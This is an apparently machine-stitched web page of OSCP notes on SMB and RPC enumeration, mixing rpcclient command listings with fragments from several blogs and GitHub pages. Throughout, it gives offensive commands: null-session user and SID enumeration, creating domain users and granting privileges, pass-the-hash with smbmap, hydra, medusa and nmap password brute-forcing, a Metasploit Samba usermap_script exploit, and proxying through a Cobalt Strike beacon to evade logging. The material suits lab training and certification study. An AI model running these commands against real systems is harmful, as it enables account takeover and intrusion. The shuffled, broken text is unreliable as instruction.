rpcclient enumeration oscp

//rpcclient enumeration oscp

C$ NO ACCESS | grep -oP 'UnixSamba. dsenumdomtrusts Enumerate all trusted domains in an AD forest Thus it might be worth a short to try to manually connect to a share. result was NT_STATUS_NONE_MAPPED -s, --configfile=CONFIGFILE Use alternative configuration file If in the above example the ttl=127, then it is safe to assume (from this information alone) that the host,, is a Linux host. seal Force RPC pipe connections to be sealed To do this first, the attacker needs a SID. INet~Services <1c> - M Cannot retrieve contributors at this time. Obviously the SIDS are different but you can still pull down the usernames and start bruteforcing those other open services. The system operates as an application-layer network protocol primarily used for offering shared access to files, printers, serial ports, and other sorts of communications between nodes on a network. | servers (ms17-010). Enumerating Windows Domains with rpcclient through SocksProxy == Bypassing Command Line Logging This lab shows how it is possible to bypass commandline argument logging when enumerating Windows environments, using Cobalt Strike and its socks proxy (or any other post exploitation tool that supports socks proxying). enumdrivers Enumerate installed printer drivers | result was NT_STATUS_NONE_MAPPED In the demonstration, a user hacker is created with the help of a createdomuser and then a password is provided to it using the setuserinfo2 command. |_smb-vuln-ms10-061: false -l, --log-basename=LOGFILEBASE Basename for log/debug files samdeltas Query Sam Deltas It accepts the group name as a parameter. getdompwinfo Retrieve domain password info rffpcnex Rffpcnex test It contains contents from other blogs for my quick reference, * nmap -sV --script=vulscan/vulscan.nse (https://securitytrails.com/blog/nmap-vulnerability-scan), masscan -p1-65535,U:1-65535 --rate=1000 10.10.10.x -e tun0 > ports, ports=$(cat ports | awk -F " " '{print $4}' | awk -F "/" '{print $1}' | sort -n | tr '\n' ',' | sed 's/,$//'), nmap -Pn -sC -sV --script=vuln*.nse -p$ports 10.10.10.x -T5 -A, (performs full scan instead of syn-scan to prevent getting flagged by firewalls), From Apache Version to finding Ubuntu version -> ubuntu httpd versions, : Private key that is used for login. A Little Guide to SMB Enumeration. --------------- ---------------------- On most Linuxes, we have tab auto-complete of commands, which extends into rpcclient commands. Initial Access. The next command to observe is the lsaquerysecobj command. You signed in with another tab or window. Defense Evasion. | \\[ip]\C$: That command reveals the SIDs for different users on the domain. 631 - Internet Printing Protocol (IPP) 873 - Pentesting Rsync. These commands should only be used for educational purposes or authorised testing. This is made from the words get domain password information. . This is an enumeration cheat sheet that I created while pursuing the OSCP. This problem is solved using lookupnames whereupon providing username the SID of that particular user can be extracted with ease. So, it is also a good way to enumerate what kind of services might be running on the server, this can be done using enumdomgroup. When dealing with SMB an attacker is bound to be dealt with the Network Shares on the Domain. samlookuprids Look up names Using rpcclient we can enumerate usernames on those OS's just like a windows OS. Learn. SegFault:~ cg$rpcclient -U "" Dec 2, 2018, PWK Notes: SMB Enumeration Checklist [Updated]. getdcname Get trusted DC name Enum4linux is a Linux alternative to enum.exe and is used to enumerate data from Windows and Samba hosts. S-1-5-21-1835020781-2383529660-3657267081-501 LEWISFAMILY\unknown (1) A NetBIOS name is up to 16 characters long and usually, separate from the computer name. [+] User SMB session establishd on [ip] enumjobs Enumerate print jobs [Update 2018-12-02] I just learned about smbmap, which is just great. If proper privileges are assigned it also possible to delete a user using the rpcclient. Where the output of the magic script needs to be stored? At last, it can be verified using the enumdomusers command. Disk Permissions rpcclient $> lookupsids S-1-5-21-1835020781-2383529660-3657267081-1010 # lines. Let's see how this works by firstly updating the proxychains config file: Once proxychains are configured, the attacker can start enumerating the AD environment through the beacon like so: proxychains rpcclient -U spotless, Victim ( is enumerating DC ( on behalf of attacker ( MSRPC was originally derived from open source software but has been developed further and copyrighted by . Some of these commands are based on those executed by the Autorecon tool. result was NT_STATUS_NONE_MAPPED SYSVOL READ ONLY, Enter WORKGROUP\root's password: In there you may, many different batch, VBScript, and PowerShell, using some discovered credentials. Further, when the attacker used the same SID as a parameter for lsaenumprivaccount, they were able to enumerate the levels of privileges such as high, low, and attribute. These may indicate whether the share exists and you do not have access to it or the share does not exist at all. We have enumerated the users and groups on the domain but not enumerated the domain itself. Since we already performed the enumeration of such data before in the article, we will enumerate using enumdomgroup and enumdomusers and the query-oriented commands in this demonstration. RPC or Remote Procedure Call is a service that helps establish and maintain communication between different Windows Applications. # lines. The ability to interact with privileges doesnt end with the enumeration regarding the SID or privileges. May need to run a second time for success. oscp pwk enumeration smb nmblookup smbclient rpcclient nmap enum4linux smbmap rpcclient is a part of the Samba suite on Linux distributions. rpcclient $> lookupsids S-1-5-21-1835020781-2383529660-3657267081-1011 There are a couple of machines in the lab that will only work on the first attempt, and . Pentesting Cheatsheets. How I Won 90 Days OSCP Lab Voucher for Free, https://github.com/s0wr0b1ndef/OSCP-note/, These notes are not in the context of any machines I had during the OSCP lab or exam. samquerysecobj Query SAMR security object This command retrieves the domain, server, users on the system, and other relevant information. enumforms Enumerate forms This command can help with the enumeration of the LSA Policy for that particular domain. rpcclient $> help ADMIN$ Disk Remote Admin While Port 139 is known technically as NBT over IP, Port 445 is SMB over IP. Once we are connected using a null session we get another set of options: This will help in getting the information such as the kind of password policies that have been enforced by the Administrator in the domain. lookupsids Convert SIDs to names Protocol_Description: Server Message Block #Protocol Abbreviation Spelled out. lsaenumsid Enumerate the LSA SIDS getdriverdir Get print driver upload directory Learning about various kinds of compromises that can be performed using Mimikatz we know that the SID of a user is the security Identifier that can be used for a lot of elevating privileges and minting tickets attacks. LSARPC help Get help on commands Assumes valid machine account to this domain controller. Double pivot works the same, but you create the 2nd ssh tunnel via proxychains and a different dynamic port. These privileges can help the attacker plan for elevating privileges on the domain. Password Checking if you found with other enum . On other systems, youll find services and applications using port 139. Software applications that run on a NetBIOS network locate and identify each other via their NetBIOS names. Replication READ ONLY sign Force RPC pipe connections to be signed | Disclosure date: 2006-6-27 setprinter Set printer comment To enumerate the Password Properties on the domain, the getdompwinfo command can be used. --------------- ---------------------- | https://technet.microsoft.com/en-us/library/security/ms17-010.aspx This command helps the attacker enumerate the security objects or permissions and privileges related to the security as demonstrated below. Impacket, 1a3487d42adaa12332bdb34a876cb7e6:1a3487d42adaa12332bdb34a876cb7e6 query. For this particular demonstration, we will first need a SID. so lets run rpcclient with no options to see whats available: SegFault:~ cg$ rpcclient I tend to check: nbtscan. It can be enumerated through rpcclient using the lsaenumsid command. A tag already exists with the provided branch name. SMB2 Windows Vista SP1 and Windows 2008, nmap -n -v -Pn -p139,445 -sV, smbclient -L \\$ip --option='client min protocol=NT1', # if getting error "protocol negotiation failed: NT_STATUS_CONNECTION_DISCONNECTED", # Will list all shares with available permissions, smbmap -u jsmith -p password1 -d workgroup -H, nmap --script smb-enum-shares -p 139,445 $ip, smbclient \\\\\\C$ --option='client min protocol=NT1', smbclient \\\\\\admin$ -U t-skid, # Connect with valid username and password, smbmap -R $sharename -H $ip -A $fileyouwanttodownload -q, smbmap -u Administrator -p aad3b435b51404eeaad3b435b51404ee:e101cbd92f05790d1a202bf91274f2e7 -H $ip -s wwwroot -R -A '. quit Exit program This command was able to enumerate two specific privileges such as SeChangeNotiftyPrivielge and SeNetworkLogonRight privilege. You signed in with another tab or window. Might ask for password. Query Group Information and Group Membership. enumprivs Enumerate privileges We can also check if the user we created has been assigned a SID or not using the lookupnames command on the rpcclient. List of SMB versions and corresponding Windows versions: SMB1 Windows 2000, XP and Windows 2003. This command can be used to extract the details regarding the user that the SID belongs. list List available commands on ENUMERATING USER ACCOUNTS ON LINUX AND OS X WITH RPCCLIENT, Hacking Samba on Ubuntu and Installing the Meterpreter. Password attack (Brute-force) Brute-force service password. -O, --socket-options=SOCKETOPTIONS socket options to use result was NT_STATUS_NONE_MAPPED *' # download everything recursively in the wwwroot share to /usr/share/smbmap. Can be Contacted onTwitterandLinkedIn, All Rights Reserved 2021 Theme: Prefer by, Windows Privilege Escalation: DnsAdmins to DomainAdmin. 1. This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository. *[0-9a-z]' | tr -d '\n' & echo -n "$rhost: " &, echo "exit" | smbclient -L $rhost 1>/dev/null 2>/dev/null, # smbenum 0.2 - This script will enumerate SMB using every tool in the arsenal, echo -e "\n########## Getting Netbios name ##########", echo -e "\n########## Checking for NULL sessions ##########", output=`bash -c "echo 'srvinfo' | rpcclient $IP -U%"`, echo -e "\n########## Enumerating domains ##########", bash -c "echo 'enumdomains' | rpcclient $IP -U%", echo -e "\n########## Enumerating password and lockout policies ##########", echo -e "\n########## Enumerating users ##########", nmap -Pn -T4 -sS -p139,445 --script=smb-enum-users $IP, bash -c "echo 'enumdomusers' | rpcclient $IP -U%", bash -c "echo 'enumdomusers' | rpcclient $IP -U%" | cut -d[ -f2 | cut -d] -f1 > /tmp/$IP-users.txt, echo -e "\n########## Enumerating Administrators ##########", net rpc group members "Administrators" -I $IP -U%, echo -e "\n########## Enumerating Domain Admins ##########", net rpc group members "Domain Admins" -I $IP -U%, echo -e "\n########## Enumerating groups ##########", nmap -Pn -T4 -sS -p139,445 --script=smb-enum-groups $IP, echo -e "\n########## Enumerating shares ##########", nmap -Pn -T4 -sS -p139,445 --script=smb-enum-shares $IP, echo -e "\n########## Bruteforcing all users with 'password', blank and username as password", hydra -e ns -L /tmp/$IP-users.txt -p password $IP smb -t 1, medusa -h $ip -u userhere -P /usr/share/seclists/Passwords/Common-Credentials/10k-most-common.txt -M smbnt, nmap -p445 --script smb-brute --script-args userdb=userfilehere,passdb=/usr/share/seclists/Passwords/Common-Credentials/10-million-password-list-top-1000000.txt $ip -vvvv, msfconsole; use auxiliary/scanner/smb/smb_version; set RHOSTS $ip; run, msfconsole; use exploit/multi/samba/usermap_script; set lhost 10.10.14.x; set rhost $ip; run, Windows 7, 8, 8.1 and Windows Server 2003/2008/2012(R2)/2016, nmap -p 445 $ip --script=smb-vuln-ms17-010, hydra -l administrator -P /usr/share/wordlists/rockyou.txt -t 1 $ip smb, smbclient \\\\\\ipc$ -U john. lsaremoveacctrights Remove rights from an account Honor privileges assigned to specific SID? rpcclient (if 111 is also open) NSE scripts. To extract further information about that user or in case during the other enumeration the attacker comes into the touch of the SID of a user, then they cause to use the lookupsids command to get more information about that particular user. | Type: STYPE_DISKTREE [DATA] attacking service smb on port 139 . 1080 - Pentesting Socks. LSARPC-DS [Original] As I've been working through PWK/OSCP for the last month, one thing I've noticed is that enumeration of SMB is tricky, and different tools . When provided the username, it extracts information such as the username, Full name, Home Drive, Profile Path, Description, Logon Time, Logoff Time, Password set time, Password Change Frequency, RID, Groups, etc. rpcclient $> lookupsids S-1-5-21-1835020781-2383529660-3657267081-1002 |_ https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/ There are times where these share folders may contain sensitive or Confidential information that can be used to compromise the target. IPC$ NO ACCESS guest access disabled, uses encryption. WARNING: Restorefile (./hydra.restore) from a previous session found, to prevent overwriting, you have 10 seconds to abort | VULNERABLE: Can try without a password (or sending a blank password) and still potentially connect. To enumerate the shares manually you might want to look for responses like NT_STATUS_ACCESS_DENIED and NT_STATUS_BAD_NETWORK_NAME, when using a valid session (e.g. When using the enumdomgroup we see that we have different groups with their respective RID and when this RID is used with the queryusergroups it reveals information about that particular holder or RID. | Comment: Remote Admin Checklist - Local Windows Privilege Escalation, Pentesting JDWP - Java Debug Wire Protocol, 161,162,10161,10162/udp - Pentesting SNMP, 515 - Pentesting Line Printer Daemon (LPD), 548 - Pentesting Apple Filing Protocol (AFP), 1098/1099/1050 - Pentesting Java RMI - RMI-IIOP, 1433 - Pentesting MSSQL - Microsoft SQL Server, 1521,1522-1529 - Pentesting Oracle TNS Listener, 2301,2381 - Pentesting Compaq/HP Insight Manager, 3690 - Pentesting Subversion (svn server), 4369 - Pentesting Erlang Port Mapper Daemon (epmd), 8009 - Pentesting Apache JServ Protocol (AJP), 8333,18333,38333,18444 - Pentesting Bitcoin, 9100 - Pentesting Raw Printing (JetDirect, AppSocket, PDL-datastream), 10000 - Pentesting Network Data Management Protocol (ndmp), 24007,24008,24009,49152 - Pentesting GlusterFS, 50030,50060,50070,50075,50090 - Pentesting Hadoop, Reflecting Techniques - PoCs and Polygloths CheatSheet, Dangling Markup - HTML scriptless injection, HTTP Request Smuggling / HTTP Desync Attack, Regular expression Denial of Service - ReDoS, Server Side Inclusion/Edge Side Inclusion Injection, XSLT Server Side Injection (Extensible Stylesheet Languaje Transformations), Pentesting CI/CD (Github, Jenkins, Terraform), Windows Exploiting (Basic Guide - OSCP lvl), INE Courses and eLearnSecurity Certifications Reviews, Stealing Sensitive Information Disclosure from a Web, Enumerate Users, Groups & Logged On Users, Manually enumerate windows shares and connect to them, . | \\[ip]\share: To begin the enumeration, a connection needs to be established. enumalsgroups Enumerate alias groups rpcclient -U "" rpcclient $> querydominfo . Once we have a SID we can enumerate the rest. getdispname Get the privilege name One of the first enumeration commands to be demonstrated here is the srvinfo command. dfsenum Enumerate dfs shares | References: S-1-5-21-1835020781-2383529660-3657267081-1015 LEWISFAMILY\bin (2) |_ Current user access: READ Server Message Block in modern language is also known as. The enum4linux utility within Kali Linux is particularly useful; with it, you can obtain the following: If you don't know what is NTLM or you want to know how it works and how to abuse it, you will find very interesting this page about. root S-1-5-21-1835020781-2383529660-3657267081-1000 (User: 1) List of SMB versions and corresponding Windows versions: SMB1 Windows 2000, XP and Windows 2003. .. D 0 Thu Sep 27 16:26:00 2018 That narrows the version that the attacker might be looking at to Windows 10, Windows Server 2016, and Windows Server 2019. Using rpcclient we can enumerate usernames on those OSs just like a windows OS. Get help on commands nmap -p 139,445 --open -oG smb.txt, nmap --script smb-enum-shares -p 139,445 $ip, smbclient -L // --option='client min protocol=NT1', # if getting error "protocol negotiation failed: NT_STATUS_CONNECTION_DISCONNECTED", SAMBA 3.x-4.x # vulnerable to linux/samba/is_known_pipename, SAMBA 3.5.11 # vulnerable to linux/samba/is_known_pipename, nmap --script=smb-enum* --script-args=unsafe=1 -T5 $ip, nmap --script=smb-vuln* --script-args=unsafe=1 -T5 $ip, nmap --script=smb2-capabilities,smb-print-text,smb2-security-mode.nse,smb-protocols,smb2-time.nse,smb-psexec,smb2-vuln-uptime,smb-security-mode,smb-server-stats,smb-double-pulsar-backdoor,smb-system-info,smb-vuln-conficker,smb-enum-groups,smb-vuln-cve2009-3103,smb-enum-processes,smb-vuln-cve-2017-7494,smb-vuln-ms06-025,smb-enum-shares,smb-vuln-ms07-029,smb-enum-users,smb-vuln-ms08-067,smb-vuln-ms10-054,smb-ls,smb-vuln-ms10-061,smb-vuln-ms17-010,smb-os-discovery --script-args=unsafe=1 -T5 $ip, nmap -p139,445 -T4 -oN smb_vulns.txt -Pn --script 'not brute and not dos and smb-*' -vv -d $ip, Windows NT, 2000, and XP (most SMB1) - VULNERABLE: Null Sessions can be created by default, Windows 2003, and XP SP2 onwards - NOT VULNERABLE: Null Sessions can't be created default. S-1-5-21-1835020781-2383529660-3657267081-1007 LEWISFAMILY\sys (2) The TTL drops 1 each time it passes through a router. rpcclient $> lookupnames lewis --------------- ---------------------- This can be done by providing the Username and Password followed by the target IP address of the server. After creating the users and changing their passwords, its time to manipulate the groups. rpcclient $> lookupsids S-1-5-21-1835020781-2383529660-3657267081-2002 os version : 4.9 SeSecurityPrivilege 0:8 (0x0:0x8) ---- ----------- # lines. without the likes of: which most likely are monitored by the blue team. My #1 SMB tip: if the exploit you're using fails despite the target appearing vulnerable, reset the machine and try again. rpcclient $> lookupsids S-1-5-21-1835020781-2383529660-3657267081-1003 It also includes the commands that I used on platforms such as Vulnhub and Hack the Box. netremotetod Fetch remote time of day Host is up (0.030s latency). What permissions must be assigned to the newly created directories? Upon running this on the rpcclient shell, it will extract the groups with their RID. |_smb-vuln-ms10-054: false We will shine the light on the process or methodology for enumerating SMB services on the Target System/Server in this article. . | A critical remote code execution vulnerability exists in Microsoft SMBv1 May need to run a second time for success. Works well for listing and downloading files, and listing shares and permissions. After verifying that the privilege was added using the lsaenumprivaccount command, we removed the privileges from the user using the lsaremoveacctrights command. Connect to wwwroot share (try blank password), Nmap scans for SMB vulnerabilities (NB: can cause DoS), Enumerate SNMP device (places info in readable format), Enumerate file privileges (see here for discussion of file_priv), Check if current user superuser (on = yes, off = no), Check users privileges over table (pg_shadow). The article is focused on Red Teamers but Blue Teamers and Purple Teamers can also use these commands to test the security configurations they deployed. --------------- ---------------------- rpcclient $> lookupsids S-1-5-21-1835020781-2383529660-3657267081-1014 Hence, they usually set up a Network Share. | Anonymous access: Hence, the credentials were successfully enumerated and the account can be taken over now. timeout connecting to RPC is built on Microsofts COM and DCOM technologies. rpcclient $> lookupsids S-1-5-21-1835020781-2383529660-3657267081-2000 echodata Echo data There are numerous tools and methods to perform enumeration, we will be finding different types of information on SMB throughout the article. IPC$ NO ACCESS

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rpcclient enumeration oscp

rpcclient enumeration oscp

rpcclient enumeration oscp